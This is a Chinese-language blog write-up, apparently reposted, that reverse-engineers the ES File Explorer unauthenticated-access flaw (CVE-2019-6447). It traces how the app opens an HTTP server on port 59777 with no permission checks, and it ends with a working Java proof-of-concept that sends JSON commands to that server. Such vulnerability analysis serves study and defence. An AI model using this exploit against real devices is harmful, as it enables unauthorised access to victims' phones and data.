【逆向实战】ES文件浏览器未授权访问漏洞(CVE-2019-6447)具体分析及利用
阅读原文时间:2021年08月06日阅读:1

/_作者:Kali_MG1937

CSDN博客号:ALDYS4

QQ:3496925334

未经许可,禁止转载_/

漏洞简介

CVE-2019-6447是Android端上的一个知名软件:ES文件浏览器的未授权访问漏洞

漏洞造成原因主要是软件在启动时会创建一个端口为59777的HTTP服务器

并且软件未对HTTP服务器的访问做任何权限检查

从而导致攻击者可利用此漏洞控制受害者的手机

虽然这个洞是在一月份爆出的,那个时候鄙人正在准备考试,所以没有关注。

所以拖到4月底才发现有这个漏洞,因为目前主攻安卓编程,所以对这个漏洞很感兴趣

所以决定现在来分析它

漏洞分析

0x01>POC解析

漏洞的POC已经被发布在github上了,先上去看看poc

poc作者对漏洞的描述就是:软件会在59777端口上开放一个HTTP服务器,可以通过构造特殊payload去请求服务器来完成攻击

接下来看看poc

可以看到poc是利用Python写的,poc作者先引入json和一些网络库后就开始编写利用代码了

execute_cmd函数内传入了三个参数:

**addr//ip地址

cmd//控制受害者手机所执行的命令

package//手机软件包名**

通过阅读代码可知

poc是通过构造特殊的json数据来命令ES文件浏览器对受害者手机进行一系列操作

0x02>分析漏洞产生原因_服务器建立过程分析

要分析漏洞,首先要下载一个带有漏洞的ES文件浏览器

通过poc作者提供的信息,漏洞在4.1.9.7及以下版本存在

那么我下载一个4.1.9.6版本进行分析

因为没有动态分析工具,所以我选择直接反编译的方法对漏洞进行溯源

(表示分析完漏洞后肝少了一个)

分析工具:Eclipse,Jd-gui,apktool,d2j-dex2jar

不用我多说了吧,先利用dex2jar将软件dex转为jar

利用jd-gui转化为java代码

我先在代码中搜索漏洞利用命令的其中一条:"getDeviceInfo"

发现es/qf.class中包含着漏洞服务器的具体代码

大致浏览一遍

发现com/estrongs/fs/impl/adb/c.class也与漏洞有所相关联

这里先不对这个class文件进行分析,在下文会进行分析

接下来先利用apktool反编译apk的Androidmianfest.xml文件

poc作者说明了:

软件会在启动时在59777端口上建立服务器

那么就要先看看软件入口了

先看xml文件

软件入口在:

com.estrongs.android.pop.app.openscreenad.NewSplashActivity

但通过分析发现

这个类只是对app的ui进行初始化

那么再仔细想想:

再软件启动时就执行的类除了清单文件中指定的入口还有什么?

对了!application属性中指定的name参数

com.estrongs.android.pop.FexApplication

先查看FexApplication类中最先执行的onCreate()方法

可以看到,oncreate方法内先后调用了q,s,r三个方法

经过排查,q()方法是对权限进行检查,r()方法是对ui的初始化

重要的是s()方法

上图中s方法先对sdk进行了一个判断和处理,这不重要,重要的是s方法最终会调用u方法

u方法中程序向下走,最终执行B方法

B方法内的代码让我眼前一亮

它向com.estrong.fs.f类中的a方法传入了两个参数

"adb",com.estrongs.fs.impl.adb.c

其中第二个参数就是我在上文中未分析的c.java文件

通过传入的参数和包名可知

这个c.class文件主要用于处理一些adb相关操作,大致浏览该类,发现还和qf.class文件有着联系

代码已经执行到关键处

那么接下来一些无关紧要的执行全部略过,我们只看程序最终执行到的关键代码

在传入参数后,代码最终执行到com.estrongs.fs.impl.adb.c

可以大致浏览一下c类,可知此类与adb处理和执行有关

程序最终会将参数传入此类的一个a方法

可以看到在a方法中,程序最终会执行到红线处

启动com.estrongs.android.pop.app.AdbControllerActivity

并且带上了两个参数

"AdbControllerActivity",嗯,很有趣的类名,对吧

该类中paramBundle成员变量获取了在c类中执行的adb命令中的向该类传递的adbRemoteIp参数

接着程序对paramBundle进行判断,若值不为空则继续执行

注意!程序在判断通过后执行了qf类的b方法

立刻跟进qf.类中的b方法

该方法会向qf类中的a方法中传入一个为false的布尔值

那么看看qf类的a方法

a方法中paramBoolean参数被传入了false

注意:其中有一句判断

if((f!=null)&&(f.c()))

**通过分析,f是一个建立套接字的线程

f.c()方法判断的是这个线程是否死亡

如果线程死亡,paramBoolean会被赋予true值**

如果程序正常运行paramBoolean会被赋予false

程序继续向下执行

接下来的执行的代码会让你兴奋

59777,这个数字是不是很熟悉

没错,就是漏洞服务器打开的端口

那么我们来看看这个参数最终传入到哪里

可知,qf类的paramString参数被传入"/sdcard"

并且qf类的e成员被赋值paramString参数

这没什么问题,对吧

关键是接下来

paramBoolean被赋予false

a被赋值paramBoolean

可是我并没有在qf类中看到有任何名为a的成员

我立刻查看了qf类的开头

**qf继承于qi

也就是说qi内所有公共的变量qf都能操作**

立刻查看qi类

可以看到qi类内的a修饰了protected

看来我的判断没错

qf类中的false值最终到达qi类

那么这里的protected boolean a=false;有什么用呢

看代码,我在图中做了注释

之前在qf类内传入的int值59777最终被传入到qi类内

最终在qi.a方法中被传入一个线程内

a方法中创建了一个套接字并开始监听59777端口

那么在59777端口上的服务器就建立完成了

可以看到在以上分析过程中程序没有进行任何访问权限的限制

0x03>分析漏洞产生原因_分析对服务器接收请求的处理

分析过poc后我们可以知道漏洞服务器通过处理特定json来返回相应的手机信息

服务器对请求的处理主要在qf.java文件中

代码先判断请求方式

接着对请求进行了一些简单判断,无错后直接进入执行

可以看到这段代码就是一个死循环

并且不断返回paramString1

在对请求进行处理时 程序对命令分析,并根据命令向a方法中传入对应的值,并且将传回的值赋值给变量paramString1并返回,显示在服务器上

那么来看看a方法

我这里直接做了分析和注释

直接看图吧

最终a方法返回了一个json,显示在服务器上

可以看到,在对服务器的请求进行处理时也没有做出任何访问限制

这就是造成漏洞的直接原因

0x04>利用Java构造POC

原理很简单,利用HttpUrlConnection向服务器发送请求就好

这里直接贴代码和截图

    public static void CVE_2019_6447(String command) throws MalformedURLException, IOException, JSONException{
        URL url=new URL("http://127.0.0.1:59777");
        HttpURLConnection http=(HttpURLConnection) url.openConnection();
        http.setRequestMethod("POST");
        http.setDoOutput(true);
        http.setReadTimeout(1000);
        http.addRequestProperty("Content-Type","application/json");
        JSONObject json=new JSONObject();
        json.put("command",command);
        DataOutputStream out=new DataOutputStream(http.getOutputStream());
        out.writeBytes(json.toString());
        System.out.println(json.toString());
        System.out.println(http.getResponseCode());
        BufferedReader br=new BufferedReader(new InputStreamReader(http.getInputStream()));
        String line="";
        while((line=br.readLine())!=null){
            System.out.println(line+"\n");
        }
    }

到这里,分析和利用就正式完成了,虽然技术含量不高,但还是学到了很多东西,还请大佬们多多指点